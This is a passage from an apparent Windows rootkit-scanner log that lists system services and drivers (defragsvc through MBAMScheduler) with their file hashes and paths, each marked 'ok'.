20:02:46.0418 0x0b14  [ 95E1ABFB27F8A62ED764805775F0D2F3, 692865DA60C93481E01592883678B2C51FD9AC9A835DFB00A8E3F2DFEE7AB0ED ] defragsvc       C:\WINDOWS\System32\defragsvc.dll
20:02:46.0449 0x0b14  defragsvc - ok
20:02:46.0527 0x0b14  [ FF086DEF5995558CCB1B5AAC2110195D, CED52FF01F9247BFDAFC5C7EFC538F8638146ED715574A422496EE0F846CB079 ] DeviceAssociationService C:\WINDOWS\system32\das.dll
20:02:46.0543 0x0b14  DeviceAssociationService - ok
20:02:46.0605 0x0b14  [ 2C02AFF8383D893F8DBEB07A84F6E77C, 7CC34BAC67E2988E3D16DD6EB6F6785CD2460E3EF7FBD0BD5F86E49793BD473E ] DeviceInstall   C:\WINDOWS\system32\umpnpmgr.dll
20:02:46.0621 0x0b14  DeviceInstall - ok
20:02:46.0668 0x0b14  [ A03F362C5557E238CBFA914689C77248, BAD0A1124E6A384C15028FBE121ADF650F7716442555AD3737B9EA1F58A69246 ] Dfsc            C:\WINDOWS\system32\Drivers\dfsc.sys
20:02:46.0668 0x0b14  Dfsc - ok
20:02:46.0746 0x0b14  [ 3EEAADA3125431980E5804ED7143458A, 381E12C83E3211C255B321D35536F4049D67E31061F8D82155E4D4509E97F43D ] Dhcp            C:\WINDOWS\system32\dhcpcore.dll
20:02:46.0761 0x0b14  Dhcp - ok
20:02:46.0902 0x0b14  [ 3ECB752A6963B1CBC9AD65ED89C8ACED, 1D47D2EBD2C8D2B9F8D2D12A5FD93E6B10335EB6B23252DDEA6DF2233655FA59 ] DiagTrack       C:\WINDOWS\system32\diagtrack.dll
20:02:46.0980 0x0b14  DiagTrack - ok
20:02:47.0058 0x0b14  [ 4D40C9B33F738797CF50E77CB7C53E85, 7BA341342A47DEB15B51971C97A5237ACD8BDAD9033F63DF0000892BE43F8E13 ] disk            C:\WINDOWS\system32\drivers\disk.sys
20:02:47.0058 0x0b14  disk - ok
20:02:47.0105 0x0b14  [ EB70A894708D1BC176AFD690FF06085F, 0DD2A97F5E1B38D1F7C0D44E50F09EA222B18B3B074CC9C8CD25A7526CB1A112 ] dmvsc           C:\WINDOWS\System32\drivers\dmvsc.sys
20:02:47.0121 0x0b14  dmvsc - ok
20:02:47.0183 0x0b14  [ 33ADFB7453BF3271463712C4BCE61AD1, A1DB30F874BA7B2C4C653494D70B46B94BF7D39D0DD8559F6CA7A14B676FD617 ] Dnscache        C:\WINDOWS\System32\dnsrslvr.dll
20:02:47.0199 0x0b14  Dnscache - ok
20:02:47.0293 0x0b14  [ 811EACBCC7C51A03AE11F13CC27B2AB6, FAB94F84950FFB7D3649BAFB8D96D43B880D7FDE8D5B879472AE26C4BC4203B0 ] dot3svc         C:\WINDOWS\System32\dot3svc.dll
20:02:47.0324 0x0b14  dot3svc - ok
20:02:47.0355 0x0b14  [ B99CB575986789A93A683DCF292A43A1, 6ACEA31C723B74003E106FC8303542FCC6DBC4952B6B523F6590D006BE57238D ] DPS             C:\WINDOWS\system32\dps.dll
20:02:47.0371 0x0b14  DPS - ok
20:02:47.0386 0x0b14  [ 00C594D5A1DBD22AD8B2902B9F6EFF94, 2920D62B5F7C49A8AFA80FCAD1E834BBAA670AEBDD7E6F21F0496D1D3CCB4E90 ] drmkaud         C:\WINDOWS\system32\drivers\drmkaud.sys
20:02:47.0402 0x0b14  drmkaud - ok
20:02:47.0449 0x0b14  [ 263625A4F616538EB867B6306A6590DB, 2A064720C247EAA3446EFDCC9E01D84CBA875905D78DFED0FBD62D1EE422D416 ] DsmSvc          C:\WINDOWS\System32\DeviceSetupManager.dll
20:02:47.0464 0x0b14  DsmSvc - ok
20:02:47.0591 0x0b14  [ E1BB0B6F00F470B451AB45EA13EBA0B3, 3A2FC2175B69A5EB98D6C2D563DBFDCB320647AB87A14E47FAE800423DCACDAB ] DXGKrnl         C:\WINDOWS\System32\drivers\dxgkrnl.sys
20:02:47.0716 0x0b14  DXGKrnl - ok
20:02:47.0794 0x0b14  [ E253530BD5EDE28F1FF6AF93C4D8034D, 787A70C3E946348F066FB8EB81FCE60157217D93FD78ADC631B5835E8D76A253 ] Eaphost         C:\WINDOWS\System32\eapsvc.dll
20:02:47.0809 0x0b14  Eaphost - ok
20:02:48.0075 0x0b14  [ 114BCFDF367FF37C3F1B0A96AF542E4D, D385BC1D91BC1406091C8C3691C07A90BD60EDE05B1384E5AA3506FCB909C857 ] ebdrv           C:\WINDOWS\system32\drivers\evbda.sys
20:02:48.0309 0x0b14  ebdrv - ok
20:02:48.0372 0x0b14  [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] EFS             C:\WINDOWS\System32\lsass.exe
20:02:48.0388 0x0b14  EFS - ok
20:02:48.0434 0x0b14  [ 43531A5993380CC5113242C29D265FD9, EE0076D96F7F3CF29884AC7A67C08A429115A7201354A1FB5DE45FD63ABB4960 ] EhStorClass     C:\WINDOWS\system32\drivers\EhStorClass.sys
20:02:48.0434 0x0b14  EhStorClass - ok
20:02:48.0481 0x0b14  [ 6F8E738A9505A388B1157FDDE7B3101B, 3696CA634102B41EEA11EB9DCA0B24439D8636AED4A7190C138C5E64A2EFB514 ] EhStorTcgDrv    C:\WINDOWS\system32\drivers\EhStorTcgDrv.sys
20:02:48.0513 0x0b14  EhStorTcgDrv - ok
20:02:48.0528 0x0b14  [ DFFFAE1442BA4076E18EED5E406FA0D3, 329FC6FB8D14BEACDBE2A5D4C496EDEA485E838B1DF27566E278F8F8E0D8E82E ] ErrDev          C:\WINDOWS\System32\drivers\errdev.sys
20:02:48.0544 0x0b14  ErrDev - ok
20:02:48.0638 0x0b14  [ F00C593994D57C75273F820653440536, 2DC986D9890EC907405FB2045E6F55ACC384169B45F0B56CCB1A953CF71D9A5D ] EventSystem     C:\WINDOWS\system32\es.dll
20:02:48.0669 0x0b14  EventSystem - ok
20:02:48.0747 0x0b14  [ 7729D294A555C7AEB281ED8E4D0E01E4, 7269E79D72CCE477AC108294D0DDFB59CF533B03C587599C5AB0507C43A0B6D4 ] exfat           C:\WINDOWS\system32\drivers\exfat.sys
20:02:48.0763 0x0b14  exfat - ok
20:02:48.0809 0x0b14  [ 7C4E0D5900B2A1D11EDD626D6DDB937B, 732F310F8F6016C56F432A81636B13CE0124A802FE8DD91287B618EED22C9A1D ] fastfat         C:\WINDOWS\system32\drivers\fastfat.sys
20:02:48.0825 0x0b14  fastfat - ok
20:02:48.0903 0x0b14  [ 304B6AEC4639A7CCCCF544C6BA6177B2, B75CDD52FD3890B3008E06C503945D1E36478F0EC5E067C8DBC2822D7935D24B ] Fax             C:\WINDOWS\system32\fxssvc.exe
20:02:48.0966 0x0b14  Fax - ok
20:02:49.0028 0x0b14  [ 5D8402613E778B3BD45E687A8372710B, EE9EA10805168D309A609B9019AEC5961EE46D18207B5E0EA2DE4064A5770AF8 ] fdc             C:\WINDOWS\System32\drivers\fdc.sys
20:02:49.0044 0x0b14  fdc - ok
20:02:49.0091 0x0b14  [ 020D2F29009F893ADEFF4405B4B44565, 9F8501064C72933D1442DA00E70392B30D0207EB7D60F50E6648FF363799E6F1 ] fdPHost         C:\WINDOWS\system32\fdPHost.dll
20:02:49.0091 0x0b14  fdPHost - ok
20:02:49.0122 0x0b14  [ E80D2EDD2F88B6E20076A0A4F5A5A245, E3CD6E0BE152B22E8A7340EFFD10CCDB1B632CD3EDF487E83F697D2E22A7D594 ] FDResPub        C:\WINDOWS\system32\fdrespub.dll
20:02:49.0138 0x0b14  FDResPub - ok
20:02:49.0169 0x0b14  [ 47AB7D16EDE434B934AA4D661456C2D5, D375A92FB3E4BB0A8DA5270DACC888E53FB9F514516039FE6DAE4D4EF6B9A970 ] fhsvc           C:\WINDOWS\system32\fhsvc.dll
20:02:49.0184 0x0b14  fhsvc - ok
20:02:49.0231 0x0b14  [ BCFD8B149B3ADF92D0DB1E909CAF0265, 002B085C131473642450176B4B8359F3E5B04350AFB659B9C0F9EB587D1181E7 ] FileInfo        C:\WINDOWS\system32\drivers\fileinfo.sys
20:02:49.0247 0x0b14  FileInfo - ok
20:02:49.0263 0x0b14  [ A1A66C4FDAFD6B0289523232AFB7D8AF, 0F5832F626BB62190D5F3A088CE6E048D8A400CCF9EA527F06973CAD96D3A81C ] Filetrace       C:\WINDOWS\system32\drivers\filetrace.sys
20:02:49.0278 0x0b14  Filetrace - ok
20:02:49.0309 0x0b14  [ BE743083CF7063C486A4398E3AEFE59A, 85796D89943DD6FE3932C1ED6CF01470C1B4DFD243C390B07055FFDA3C231551 ] flpydisk        C:\WINDOWS\System32\drivers\flpydisk.sys
20:02:49.0309 0x0b14  flpydisk - ok
20:02:49.0356 0x0b14  [ C1FB505A73FA2E9019D32444AB33B75A, 765F0635C18295855CA4C0394192E8B94BA2EA1C4D74F86B720358ABA019FFAA ] FltMgr          C:\WINDOWS\system32\drivers\fltmgr.sys
20:02:49.0403 0x0b14  FltMgr - ok
20:02:49.0544 0x0b14  [ 6C068E7207F183FF3647E45D2599E80C, D65C9888522CA29596D5C8BEFF42356F0310E812117E72C1D612BA089C0940D9 ] FontCache       C:\WINDOWS\system32\FntCache.dll
20:02:49.0623 0x0b14  FontCache - ok
20:02:49.0717 0x0b14  [ 1C52387BF5A127F5F3BFB31288F30D93, 90D13F60170CD74304F3036A90D596AA3E1E134455A780310BDF67AC7815F2E7 ] FontCache3.0.0.0 C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
20:02:49.0733 0x0b14  FontCache3.0.0.0 - ok
20:02:49.0795 0x0b14  [ A7C31B168F371E8E6796219F23E354DB, C51C9BF568F1E96CBBE57D2432B38F93F40520086DDB6AAAAC48CBCD1691B441 ] FsDepends       C:\WINDOWS\system32\drivers\FsDepends.sys
20:02:49.0811 0x0b14  FsDepends - ok
20:02:49.0842 0x0b14  [ 09F460AFEDCA03F3BF6E07D1CCC9AC42, B832091BC9B2C2FE38A4BCA132ABB58251E851F21EC6F39636E73777AB9A5791 ] Fs_Rec          C:\WINDOWS\system32\drivers\Fs_Rec.sys
20:02:49.0842 0x0b14  Fs_Rec - ok
20:02:49.0920 0x0b14  [ F152D55E497E12256290C43B31C7D0CE, FFC54B14CCFBC1548948C07FB3866E40A11D0C05AC352BD000E71CEF053F6A6E ] fvevol          C:\WINDOWS\system32\DRIVERS\fvevol.sys
20:02:49.0967 0x0b14  fvevol - ok
20:02:49.0998 0x0b14  [ 9591D0B9351ED489EAFD9D1CE52A8015, AC64C236C3AE545FCE8ED44A4A87FB86265A453BA60026EC9A4DE2B631E99996 ] FxPPM           C:\WINDOWS\System32\drivers\fxppm.sys
20:02:50.0014 0x0b14  FxPPM - ok
20:02:50.0045 0x0b14  [ FC3EF65EE20D39F8749C2218DBA681CA, 12980F1DE99B25E6920A33556F3ABDA5EC9BFE4757BE602130B5E939D8D25CE3 ] gagp30kx        C:\WINDOWS\system32\drivers\gagp30kx.sys
20:02:50.0061 0x0b14  gagp30kx - ok
20:02:50.0155 0x0b14  [ C403C5DB49A0F9AAF4F2128EDC0106D8, 3C6948B63278022D8182F773C5FA15784514F76C1546118DDBADBA322B962D12 ] GamesAppService C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe
20:02:50.0201 0x0b14  GamesAppService - ok
20:02:50.0248 0x0b14  [ 0BF5CAD281E25F1418E5B8875DC5ADD1, 0929AD8437DD78234553D8B2CDF0D6838FD54ACDE1918AFEBE48684EB32A07A3 ] gencounter      C:\WINDOWS\System32\drivers\vmgencounter.sys
20:02:50.0248 0x0b14  gencounter - ok
20:02:50.0326 0x0b14  [ 8DF1254093B5C354CE725EB6B9B0DE19, DE6C5661CC076DA44B8A5D044FDB7280EDCF38D322A98C14FDC82E25586B3014 ] GPIOClx0101     C:\WINDOWS\system32\Drivers\msgpioclx.sys
20:02:50.0342 0x0b14  GPIOClx0101 - ok
20:02:50.0483 0x0b14  [ 0D03F87D4FF4ADBAF8336DD80548155A, BC10CFA88EA2F41A8D96CB810B7953A4C168B79273A3E804A9F020F49AB58CD3 ] gpsvc           C:\WINDOWS\System32\gpsvc.dll
20:02:50.0561 0x0b14  gpsvc - ok
20:02:50.0686 0x0b14  [ E1B44A75947137F4143308D566889837, EC7E883E7AF38BF3AC0AC513CFDE0186038443E9ACC7AD616EE6BD0EC09AACB9 ] gupdate         C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
20:02:50.0686 0x0b14  gupdate - ok
20:02:50.0701 0x0b14  [ E1B44A75947137F4143308D566889837, EC7E883E7AF38BF3AC0AC513CFDE0186038443E9ACC7AD616EE6BD0EC09AACB9 ] gupdatem        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
20:02:50.0717 0x0b14  gupdatem - ok
20:02:50.0748 0x0b14  [ D4B7ED39C7900384D9E5C1283F1E7926, F93F98858067B40F1C071EAD0F8E85442A78B95342BC692AF4D726540634923F ] HDAudBus        C:\WINDOWS\System32\drivers\HDAudBus.sys
20:02:50.0764 0x0b14  HDAudBus - ok
20:02:50.0811 0x0b14  [ 10A70BC1871CD955D85CD88372724906, 2480A74854D0A89FF028EE9BA41224D4B2F9B0863066BFC43097920794FEE08D ] HidBatt         C:\WINDOWS\System32\drivers\HidBatt.sys
20:02:50.0811 0x0b14  HidBatt - ok
20:02:50.0889 0x0b14  [ 42F88B57CAE42FC10059C887B3FCFCEA, 9363AA2B8E839A6935A7C6A36C491938DF78024886DCCE6D29CB18E1D6A6D806 ] HidBth          C:\WINDOWS\System32\drivers\hidbth.sys
20:02:50.0905 0x0b14  HidBth - ok
20:02:50.0920 0x0b14  [ C241A8BAFBBFC90176EA0F5240EACC17, 571E20B87818618BE9179986177D55739A240F04D1F740B3C1B7809B9427B767 ] hidi2c          C:\WINDOWS\System32\drivers\hidi2c.sys
20:02:50.0936 0x0b14  hidi2c - ok
20:02:50.0998 0x0b14  [ 9BDDEE26255421017E161CCB9D5EDA95, B766FD5E31708F29384F69418FC33C4BCC6E3064AA553D5B1D30EE0B8B1BFB40 ] HidIr           C:\WINDOWS\System32\drivers\hidir.sys
20:02:51.0014 0x0b14  HidIr - ok
20:02:51.0061 0x0b14  [ EA85B5093DF7B5C3E80362B053740AE2, 1D4251385402A2ADEE8FA1642F54180304F88337DA74989BDE44025ABB145FE5 ] hidserv         C:\WINDOWS\system32\hidserv.dll
20:02:51.0061 0x0b14  hidserv - ok
20:02:51.0108 0x0b14  [ 8DB8EAB9D0C6A5DF0BDCADEA239220B4, EDA23E6909EB83E5E148816DFB16CC29EA01BD6BD2F73AA46B3D820B85FB9C83 ] HidUsb          C:\WINDOWS\System32\drivers\hidusb.sys
20:02:51.0108 0x0b14  HidUsb - ok
20:02:51.0170 0x0b14  [ 93C4315F47F8D635C6DB0DF49FCE10EE, 70C52B8927D54ACD23F27948780B522974250FD5CD81AA9801C3F158C402889F ] hkmsvc          C:\WINDOWS\system32\kmsvc.dll
20:02:51.0186 0x0b14  hkmsvc - ok
20:02:51.0233 0x0b14  [ AC49522ED106BD4B545D6614D71C2445, 40BD738A301170378ECFC031635EB04E2F812B676376CADDD6607ECABEC9255F ] HomeGroupListener C:\WINDOWS\system32\ListSvc.dll
20:02:51.0248 0x0b14  HomeGroupListener - ok
20:02:51.0326 0x0b14  [ 99932E30CE0283B73BB6E5019E150394, 1F88C2F56A7B8E1F75E6359281F418F9661DA4FB7B7D7B14FA7F718B15D4DCE0 ] HomeGroupProvider C:\WINDOWS\system32\provsvc.dll
20:02:51.0358 0x0b14  HomeGroupProvider - ok
20:02:51.0451 0x0b14  [ 2A8B93A01621E100A578E83C768AFA2C, 6637D260AF180D1F200D219796FCE6D524FC6BF57C0CEEF9E1B3616E85865AD1 ] HP Support Assistant Service C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe
20:02:51.0451 0x0b14  HP Support Assistant Service - ok
20:02:51.0578 0x0b14  [ D2946D9F020AE76E9CEF9B4A6DF838C0, C29CE594879385DA12B8EAA90B258905827B613839CCD820DE49215B68676995 ] hpqwmiex        C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
20:02:51.0640 0x0b14  hpqwmiex - ok
20:02:51.0687 0x0b14  [ A6AACEA4C785789BDA5912AD1FEDA80D, D197012A5DA6AB3F76FF298336DF0CF027C07ECC71267BAEF5912DE12893E096 ] HpSAMD          C:\WINDOWS\system32\drivers\HpSAMD.sys
20:02:51.0703 0x0b14  HpSAMD - ok
20:02:51.0734 0x0b14  [ F50912B0A861ED396F6062E79C37A4A7, 9B53EA5A03BB664EF5343B766C760BB8A96697ED4F2A0C81A4F58C443B4BC329 ] HPWMISVC        C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
20:02:51.0750 0x0b14  HPWMISVC - ok
20:02:51.0844 0x0b14  [ E87A6D3B8FECD5B93BC0CFBB48C27970, 55C49B6F3822450447C082B40A263F3370694DB53AD0018ADEB911E4A9F65A88 ] HTTP            C:\WINDOWS\system32\drivers\HTTP.sys
20:02:51.0906 0x0b14  HTTP - ok
20:02:51.0953 0x0b14  [ 90656C0B3864804B090434EFC582404F, BDB60050B729AACB9E009AC7129BEBD6298BBD8A9DB14B817D02E8E13669BD6E ] hwpolicy        C:\WINDOWS\system32\drivers\hwpolicy.sys
20:02:51.0969 0x0b14  hwpolicy - ok
20:02:52.0015 0x0b14  [ 6D6F9E3BF0484967E52F7E846BFF1CA1, C982966BDE6A3E6773D9441ADA7A3B08D13511DFC68D04DF303248B942423F38 ] hyperkbd        C:\WINDOWS\System32\drivers\hyperkbd.sys
20:02:52.0031 0x0b14  hyperkbd - ok
20:02:52.0047 0x0b14  [ 907C870F8C31F8DDD6F090857B46AB25, 308664A31717383D06185875E76C6612407A9F04E7DB28404F574A5706C6715D ] HyperVideo      C:\WINDOWS\system32\DRIVERS\HyperVideo.sys
20:02:52.0047 0x0b14  HyperVideo - ok
20:02:52.0109 0x0b14  [ 49EE0AE9E5B64FFBBD06D55C4984B598, 8866627F9241B24A59C81D8BCC67A4DCA87576F589599BA291D0E323F679EB4D ] i8042prt        C:\WINDOWS\System32\drivers\i8042prt.sys
20:02:52.0125 0x0b14  i8042prt - ok
20:02:52.0187 0x0b14  [ 5D90E32E36CE5D4C535D17CE08AEAF05, 976A463343E8C8308AFBE9E64DF56C430D2241DE002430D00318AB065EB72E4A ] iaLPSSi_GPIO    C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys
20:02:52.0203 0x0b14  iaLPSSi_GPIO - ok
20:02:52.0234 0x0b14  [ DD05E7E80F52ADE9AEB292819920F32C, E71AB6A50B0F90C8F94569CE89F66F915A0A4A00D4AC091B2E5E750D88CFC334 ] iaLPSSi_I2C     C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys
20:02:52.0250 0x0b14  iaLPSSi_I2C - ok
20:02:52.0328 0x0b14  [ 050F2539E14F9D5E90A4B61738EC29BD, 0E65468B9F452FA7DB6DF2C1B2B2E9439C79031E27054FBDBDFE28A9F98721D7 ] iaStorA         C:\WINDOWS\System32\drivers\iaStorA.sys
20:02:52.0375 0x0b14  iaStorA - ok
20:02:52.0469 0x0b14  [ 08BFE413B0B4AA8DFA4B5684CE06D3DC, 95DEEBB203E12EE6E191F5247A74C04AEC0E16DE981FADDC4D6C42EE41D8D079 ] iaStorAV        C:\WINDOWS\system32\drivers\iaStorAV.sys
20:02:52.0515 0x0b14  iaStorAV - ok
20:02:52.0578 0x0b14  [ A2200C3033FA4EF249FC096A7A7D02A2, 5819F5C2020DE2EEE339B0C08CD4B1E3490EAFBBEA1277CE649DB5A5150986B0 ] iaStorV         C:\WINDOWS\system32\drivers\iaStorV.sys
20:02:52.0609 0x0b14  iaStorV - ok
20:02:52.0625 0x0b14  IEEtwCollectorService - ok
20:02:52.0734 0x0b14  [ 3DBDBD9581C015F02651D6A89801FAD5, 81B6D302C9CD29AD8319515056CFBCD0BD25619B2B166937ACD5F1416B568837 ] IKEEXT          C:\WINDOWS\System32\ikeext.dll
20:02:52.0797 0x0b14  IKEEXT - ok
20:02:53.0125 0x0b14  [ C2F868881D48A568B525255F084EF063, EFB1704AE223CF886EDA5F1411C8178EDE4B5E1F7EE373E3DA89A6EA1A57D91D ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RTKVHD64.sys
20:02:53.0422 0x0b14  IntcAzAudAddService - ok
20:02:53.0500 0x0b14  [ 4E448FCFFD00E8D657CD9E48D3E47157, 4A958CF0BF8DAEAE5E008500BA67CE89B21388592811274331EE39CAC1043A00 ] intelide        C:\WINDOWS\system32\drivers\intelide.sys
20:02:53.0500 0x0b14  intelide - ok
20:02:53.0531 0x0b14  [ A770340FC02B999EF0DE6C2A6BC8437C, 214567BE706B21BEA7EC13AF6B10FBFF658000511DBBA79BAA28D1D4EFD029A7 ] intelpep        C:\WINDOWS\system32\drivers\intelpep.sys
20:02:53.0531 0x0b14  intelpep - ok
20:02:53.0570 0x0b14  [ 47E74A8E53C7C24DCE38311E1451C1D9, 79B06E37A552C8A847404D4C572CDB8CF525354D8AE3BEBC06892B7C3B330761 ] intelppm        C:\WINDOWS\System32\drivers\intelppm.sys
20:02:53.0601 0x0b14  intelppm - ok
20:02:53.0632 0x0b14  [ 9DB76D7F9E4E53EFE5DD8C53DE837514, 07BA4EDA9BE9139A689A2C3EFC1D1A4F3D1216625ED145F313398292A2CD5703 ] IpFilterDriver  C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
20:02:53.0648 0x0b14  IpFilterDriver - ok
20:02:53.0757 0x0b14  [ A5800036E4EA06697A34742A24ACFBE1, BA67060526E9213000B4206F86A74F904999AD7018EFCBE4FE9708650DA9D973 ] iphlpsvc        C:\WINDOWS\System32\iphlpsvc.dll
20:02:53.0804 0x0b14  iphlpsvc - ok
20:02:53.0851 0x0b14  [ 9C096BF5E10CA8BFA56F32522A89FAF1, 6C1151160799338DA351C7237AB049926C6C15F24F5E154BBF5929B4A96C0B8D ] IPMIDRV         C:\WINDOWS\System32\drivers\IPMIDrv.sys
20:02:53.0882 0x0b14  IPMIDRV - ok
20:02:53.0898 0x0b14  [ B7342B3C58E91107F6E946A93D9D4EFD, D5DA3C02C5C5A343785745EF6983CC9B5FBD3FB8D49FE9B450523E50212D1A32 ] IPNAT           C:\WINDOWS\system32\drivers\ipnat.sys
20:02:53.0929 0x0b14  IPNAT - ok
20:02:53.0976 0x0b14  [ AE44C526AB5F8A487D941CEB57B10C97, A783A2EAF7A6FF450FB3F189A5930036FA60D125C42171AC44B6FE2E3DBD6F7A ] IRENUM          C:\WINDOWS\system32\drivers\irenum.sys
20:02:53.0992 0x0b14  IRENUM - ok
20:02:54.0007 0x0b14  [ 8AFEEA3955AA43616A60F133B1D25F21, E99359A4F1D653790133F145CF7C9F97399FD75C5E135AA7E5F989BB660789AF ] isapnp          C:\WINDOWS\system32\drivers\isapnp.sys
20:02:54.0023 0x0b14  isapnp - ok
20:02:54.0101 0x0b14  [ D90AB68D0FAC9F357F663670FDBB511E, A82AAA5DF1B38EFBDCF834535A0C520D1BB2D7A4A906C18CFDD22BCF16BDB97D ] iScsiPrt        C:\WINDOWS\System32\drivers\msiscsi.sys
20:02:54.0148 0x0b14  iScsiPrt - ok
20:02:54.0164 0x0b14  [ 5917AFE4A3F695A54B99C1849C8207FE, DD57638966F2F0387DCF9DA4BBAEE3CDD8CC6F1A2D49581A0374D46A565BED4F ] kbdclass        C:\WINDOWS\System32\drivers\kbdclass.sys
20:02:54.0179 0x0b14  kbdclass - ok
20:02:54.0226 0x0b14  [ 8CD840A062F6BDF41DDE3ACB96164B72, AEAE867F3557C1CE6B931E19D7144A3BD3CBABD81B1542667680D54FC24DEBE1 ] kbdhid          C:\WINDOWS\System32\drivers\kbdhid.sys
20:02:54.0226 0x0b14  kbdhid - ok
20:02:54.0273 0x0b14  [ 813871C7D402A05F2E3A7075F9584A05, FF0C2F87EB083F8CE74C679D80C845CDFBFBBC70BE818F899F3336BBB54A3FFB ] kdnic           C:\WINDOWS\system32\DRIVERS\kdnic.sys
20:02:54.0289 0x0b14  kdnic - ok
20:02:54.0304 0x0b14  [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] KeyIso          C:\WINDOWS\system32\lsass.exe
20:02:54.0320 0x0b14  KeyIso - ok
20:02:54.0335 0x0b14  [ 4E829B18D5BAEC29893792A3C671A847, 64C3B99F53A9D1ACA802B46B09E820AD210B667D5A1CD0ADAF1F12944B15B52E ] KSecDD          C:\WINDOWS\system32\Drivers\ksecdd.sys
20:02:54.0335 0x0b14  KSecDD - ok
20:02:54.0367 0x0b14  [ 46711F40D0F9E63F786ED23F9BD5215E, 1FBC5101D843E5B43184C98B3D9AF3015C9409EEA6C7BB01B143FD08D4946FC0 ] KSecPkg         C:\WINDOWS\system32\Drivers\ksecpkg.sys
20:02:54.0382 0x0b14  KSecPkg - ok
20:02:54.0398 0x0b14  [ 11AFB527AA370B1DAFD5C36F35F6D45F, 757AD234284467ADB826F7CA0251F58D48866B91995BC867DEA4BAF676947163 ] ksthunk         C:\WINDOWS\system32\drivers\ksthunk.sys
20:02:54.0414 0x0b14  ksthunk - ok
20:02:54.0492 0x0b14  [ C1591A66028C71147A3E2EAB0B1CCB7E, 82F3D5DCC1614398A144D9791E4BAA814DBA9112677341FD57D5E9834CEDEB41 ] KtmRm           C:\WINDOWS\system32\msdtckrm.dll
20:02:54.0523 0x0b14  KtmRm - ok
20:02:54.0601 0x0b14  [ CA2828DDE4B09FEFFDB7CE68B3D8D00A, B514792FF1EF36C678BB51644A1C420105D5E2CD6DD5A89A3FB252D08277A40C ] LanmanServer    C:\WINDOWS\system32\srvsvc.dll
20:02:54.0617 0x0b14  LanmanServer - ok
20:02:54.0679 0x0b14  [ 3DBD9100745F9B8506B8FEC6FE6CCDE3, C3EF2856A1680AFDE133887E48946CF9CAB6755C3BDC07F0326965DCD4096F62 ] LanmanWorkstation C:\WINDOWS\System32\wkssvc.dll
20:02:54.0710 0x0b14  LanmanWorkstation - ok
20:02:54.0789 0x0b14  [ 8B9F3796EC1762CF255BDB324E5529C8, F73D6BEF19BE20AEB18DA82CB63E9D8B50ACBBE4ED9B646EF0C9F598F6B81F94 ] lfsvc           C:\WINDOWS\System32\GeofenceMonitorService.dll
20:02:54.0835 0x0b14  lfsvc - ok
20:02:54.0867 0x0b14  [ C09010B3680860131631F53E8FE7BAD8, 35F2A06D5F29478D22ABDCC20DA893EF9D96504C65594A0CEA674D1C21B04FF8 ] lltdio          C:\WINDOWS\system32\DRIVERS\lltdio.sys
20:02:54.0882 0x0b14  lltdio - ok
20:02:54.0945 0x0b14  [ DAE98CC96C5EE308BF4EA7B18F226CB8, 7A6CC56BF075010707715AB6608764291E358EDF27C806A025532869004C686B ] lltdsvc         C:\WINDOWS\System32\lltdsvc.dll
20:02:54.0976 0x0b14  lltdsvc - ok
20:02:55.0007 0x0b14  [ 1E2662D847B7D9995C65D90D254A7E0F, AFD4063D2071FFCB6B0EAC0715276D986F42326919C86E525DCE12E1109A93E2 ] lmhosts         C:\WINDOWS\System32\lmhsvc.dll
20:02:55.0007 0x0b14  lmhosts - ok
20:02:55.0070 0x0b14  [ C755AE4635457AA2A11F79C0DF857ABC, E03D1ACAC155287291FE1BD0B653953ADC94279A74D0152088D698FAA796460F ] LSI_SAS         C:\WINDOWS\system32\drivers\lsi_sas.sys
20:02:55.0085 0x0b14  LSI_SAS - ok
20:02:55.0117 0x0b14  [ ADAC09CBE7A2040B7F68B5E5C9A75141, 7865DA7E91404F3642BC444B97F6B7AA42B9523D5EDD7F6365DA236B8EC3410F ] LSI_SAS2        C:\WINDOWS\system32\drivers\lsi_sas2.sys
20:02:55.0132 0x0b14  LSI_SAS2 - ok
20:02:55.0179 0x0b14  [ 04D1274BB9BBCCF12BD12374002AA191, 4B9618F8D25F2278DE1610A70ACAADB074D171D162C3AF27D464F5DC800A8E60 ] LSI_SAS3        C:\WINDOWS\system32\drivers\lsi_sas3.sys
20:02:55.0195 0x0b14  LSI_SAS3 - ok
20:02:55.0242 0x0b14  [ 327469EEF3833D0C584B7E88A76AEC0C, 3D88B5A2D68F93F01B39C6E3D8D5C7A2A20686EFC756086E66AFFF1BC3019B85 ] LSI_SSS         C:\WINDOWS\system32\drivers\lsi_sss.sys
20:02:55.0257 0x0b14  LSI_SSS - ok
20:02:55.0351 0x0b14  [ 9A7A7E45DAED2E8C2816716D8D28236A, C94787988826E546A8DC752BD6BE4EA7423DC3762B2D371DB297A63F865A95FF ] LSM             C:\WINDOWS\System32\lsm.dll
20:02:55.0398 0x0b14  LSM - ok
20:02:55.0445 0x0b14  [ DDEE191AB32DFC22C6465002ECDF5EE4, 190C3930A8449118F9FEDF43C482837EF1C255E6D67F9651156E66A1E2BC6553 ] luafv           C:\WINDOWS\system32\drivers\luafv.sys
20:02:55.0460 0x0b14  luafv - ok
20:02:55.0492 0x0b14  [ A8D28D5B3E2A528D1EF0E338E44F2820, 40D1EFDD253BC0A0D984A5AD8A2721C3E83B15F14D538204714E6D5B00D92CEB ] MBAMProtector   C:\WINDOWS\system32\drivers\mbam.sys
20:02:55.0492 0x0b14  MBAMProtector - ok
20:02:55.0680 0x0b14  [ 301E3FDFCF33640BB8763BA444BC5093, 362B069BB9A313A06B376CE27E6F7F8D569F6CA39A8ABC96D9DF231EE462C604 ] MBAMScheduler   C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
20:02:55.0789 0x0b14  MBAMScheduler - ok
